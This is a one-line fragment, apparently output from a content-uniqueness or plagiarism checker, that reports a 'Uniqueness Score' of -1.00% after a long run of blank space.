                                                                                                                                                    Uniqueness Score: -1.00%